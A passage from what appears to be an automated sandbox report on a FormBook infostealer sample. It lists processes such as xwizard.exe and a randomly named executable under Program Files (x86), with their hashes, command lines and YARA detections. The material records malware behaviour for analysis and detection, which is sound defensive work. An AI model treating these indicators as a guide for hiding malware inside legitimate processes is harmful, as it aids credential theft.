                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.65194174244.0000000005260000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:4
                                                        Start time:12:48:06
                                                        Start date:10/12/2024
                                                        Path:C:\Windows\SysWOW64\xwizard.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\xwizard.exe"
                                                        Imagebase:0xa70000
                                                        File size:55'808 bytes
                                                        MD5 hash:8581F29C5F84B72C053DBCC5372C5DB6
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.65194002621.0000000003420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.65194255223.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.65192118300.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:5
                                                        Start time:12:48:19
                                                        Start date:10/12/2024
                                                        Path:C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe"
                                                        Imagebase:0x280000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.65193414239.00000000014F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:12:48:31
                                                        Start date:10/12/2024
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff7a4780000
                                                        File size:597'432 bytes
                                                        MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        No disassembly